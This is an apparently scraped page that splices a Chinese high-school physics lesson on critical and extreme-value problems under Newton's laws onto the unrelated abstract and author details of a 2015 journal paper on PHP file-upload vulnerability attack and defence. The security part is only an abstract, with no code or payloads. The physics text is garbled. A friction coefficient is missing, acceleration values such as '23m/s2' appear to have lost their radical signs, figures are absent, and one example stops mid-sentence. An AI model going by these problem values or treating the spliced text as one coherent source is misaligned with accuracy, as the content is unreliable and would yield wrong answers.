牛顿第二定律临界问题 This model paper was revised by the Standardization Office on December 10, 2020
高中物理教案学案 第三章牛顿运动定律 第五课时牛顿定律应用中的临界和极值问题1、知识回顾: ⑴如图所示,水平放置的长木板AB上静 置一个小物块,小物块与木板之间的动摩 擦因数μ恒定。现将木板绕其A端沿逆时针方向缓慢旋转,下列图线中能最好地描述小物块沿长木板滑下的加速度a和长木板与水平面间夹角θ的关系的是( B )。 ⑵质点所受的力F随时间变化的规律如图所示,力的方向始终在一直线上, 已知t=0时质点的速度为零。在图示t 1、t 2 、t 3 和t 4 各时刻中,质点的速 度最大的是:( B ). A.t l B.t 2 C.t 3 D.t 4 A B
2、典型例题分析: 【例1】传送带是一种常用的运输工具,它被广 泛地应用于矿山、码头、货场等生产实际中, 在车站、机场等交通场所它也发挥着巨大的作 用。如图所示为车站使用的水平传送带装置模型,绷紧的传送带水平部分 AB的长度L=5m,并以V 传 =2m/s的速度向右传动。现将一个可视为质点的旅行包轻轻地无初速地放在传送带的A端,已知旅行包与皮带之间的动摩擦因数μ=。求: ⑴旅行包在传送带上从A端运动到B端所用的时间; ⑵若要旅行包在传送带上从A端运动到B端所用的时间最短,则传动的速度大小应满足什么条件(g=10m/s2) 【解析】⑴由于旅行包的初速为零,在开始阶段,旅行包速度 小于传送带的速度,故旅行包相对于传送带向左运动,其受到 的滑动摩擦力向右,此滑动摩擦力使旅行包产生加速度,旅行 包向右做初速度为零的匀加速运动(如图所示)。但旅行包是否是匀加速运动到B端,却要看旅行包从A端运动到B端过程中是否一直受到滑动摩擦力作用。判断依据是这一过程中若旅行包一直做匀加速运动,其到达B端的速 度V B 是否大于皮带传动的速度V 传 :①V B ≤V 传 ,则旅行包一直做匀加速运 动;②若V B >V 传 ,则旅行包先做匀加速直线运动后做匀速运动。 f mg
专题五牛顿运动定律的应用 ——临界和极值问题 一、概念 (1)临界问题:某种物理现象(或物理状态)刚好要发生或刚好不发生的转折状态。 (2)极值问题:在满足一定的条件下,某物理量出现极大值或极小值的情况。 二、关键词语 在动力学问题中出现的“最大”、“最小”、“刚好”、“恰能”等词语,一般都暗示了临界状态的出现,隐含了相应的临界条件。有些物理过程中没有明显出现临界问题的线索,但在变化过程中可能出现临界问题,也可能不出现临界问题,解答这类问题一般用假设法。 三、常见类型 动力学中的常见临界问题主要有三类:一是弹力发生突变时接触物体间的脱离与不脱 离的问题;二是绳子的绷紧与松弛问题;三是摩擦力发生突变的滑动 与不滑动问题。 四、解题关键 解决此类问题的关键是对物体运动情况的正确描述,对临界状态的判断与分析,找出处于临界状态时存在的独特的物理关系,即临界条件。 常见的三类临界问题的临界条: 1、相互接触的两个物体将脱离的临界条件是:相互作用的弹力为零。
2、绳子松弛的临界条件是:绳子的拉力为零。 3、存在静摩擦的系统,相对滑动与相对静止的临界条件是:静摩擦力达到最大值。 五、例题解析 【例题1】质量为0.2kg的小球用细线吊在倾角为θ=60°的斜面体的顶端,斜面体静止时,小球紧靠在斜面上,线与斜面平行,如图所示,不计摩擦,求在下列三种情况下,细线 对小球的拉力(取g=10 m/s2) (1) 斜面体以23m/s2的加速度向右加速运动; (2) 斜面体以43m/s2,的加速度向右加速运动; 【例题2】如图所示,轻绳AB与竖直方向的夹角θ=37°,绳BC水平,小球质量m=0.4 kg,取g=10m/s2。试求: (1)小车以a1=2.5m/s2的加速度向右做匀加速运动时,绳AB的张力是多少? (2)小车以a2=8m/s2的加速度向右做匀加速运动时,绳AB的张力是多少? 【例题3】如图所示,质量为2kg 的m1和质量为1kg 的m2两个物体叠放在一起,放在水平面,m1与m2、m1与水平面间的动摩擦因数都是0.3,现用水平拉力F拉m1,使
53 PHP Web 应用程序上传漏洞的攻防研究韦鲲鹏1,葛志辉1,杨波2 (1.广西大学计算机与电子信息学院,广西南宁 530004;2.中国电信集团系统集成有限责任公司广西分公司,广西南宁 530028) 摘 要:基于PHP(hypertext preprocessor)的Web 应用程序是目前互联网中使用最为广泛 的Web 应用,一旦PHP Web 应用程序出现安全漏洞,系统中存储的数据和用户的安全就受到 很大的威胁。因此,PHP Web 应用程序的安全漏洞受到越来越多的关注,如何对PHP Web 应 用程序进行安全防护已经成为当前研究的一大热点。在PHP Web 安全中出现概率很大而且危 害也很大的攻击有跨站脚本漏洞、SQL 注入漏洞、代码执行漏洞及上传漏洞等。目前在跨站脚 本漏洞、SQL 注入漏洞和代码执行漏洞等领域都已经有了系统的攻防研究,特别是SQL 注入漏 洞更是人们关注的热点。而针对PHP Web 应用程序上传漏洞却缺少系统性的攻防研究,一些 防范方法也已经过时,很多攻击技术和防范方法都没有涉及。文章首先对PHP Web 应用上传 漏洞进行了全面详细的分析,接着给出具体详细的防护措施,最后总结出PHP Web 应用程序 文件上传功能的安全开发建议。 关键词:PHP Web ;漏洞;文件上传;攻防 中图分类号:TP309 文献标识码: A 文章编号:1671-1122(2015)10-0053-08 中文引用格式:韦鲲鹏,葛志辉,杨波. PHP Web 应用程序上传漏洞的攻防研究[J]. 信息网络安全, 2015,(10):53-60. 英文引用格式:WEI K P, GE Z H, YANG B. Research on Attack-defense of PHP Web Application Upload Vulnerability[J]. Netinfo Security, 2015, (10) : 53-60. Research on Attack-defense of PHP Web Application Upload Vulnerability WEI Kun-peng 1, GE Zhi-hui 1, YANG Bo 2 (1. College of Computer and Electronic Information, Guangxi University, Nanning Guangxi 530004, China ; 2. China Telecom Group System Integration Limited Liability Company, Guangxi Branch, Nanning Guangxi 530028, China ) Abstract: The Web application set up by PHP (hypertext preprocessor) is the most widely use in the Internet. Once the PHP Web application with security vulnerability, the security of the data and the users of the system is greatly threaten. Because of this, the security vulnerability of PHP Web applications is getting more and more attention. How to secure the PHP Web application protection has become a hot spot in the research of the current. There is a lot of probability and the damage is great attack in the security of PHP Web. They are XSS vulnerability, SQL injection vulnerability, code execution vulnerability and upload vulnerability etc. So far, there has been a system of defensive research in XSS, SQL vulnerabilities and code execution vulnerability and other fields, the SQL injection is more popular in the top. Correspondingly, the Web PHP applications of upload vulnerability are lack of a systematic attack and defense research. Related content could appear in only one chapter in an article, some of these prevention methods are outdated, and many of the latest attack techniques and prevention methods are not involved. The article analyzes carefully on the file upload attack in PHP Web application and gives the corresponding protective measures, and sums up some security development suggestions about file-upload capabilities in PHP Web application.Key words: PHP Web; vulnerability; file upload; attack-defense 收稿日期: 2015-08-14 基金项目: 国家自然科学基金[61363067] 作者简介: 韦鲲鹏(1990-),男,广西,硕士研究生,主要研究方向:网络安全;葛志辉(1978-),男,河北,教授,博士,主要研究方向:无线网络、移动互联网、网络性能优化;杨波(1974-),男,广西,工程师,本科,主要研究方向:系统集成。 通讯作者: 韦鲲鹏 wepeng@https://www.doczj.com/doc/a018001889.html, doi :10.3969/j.issn.1671-1122.2015.10.008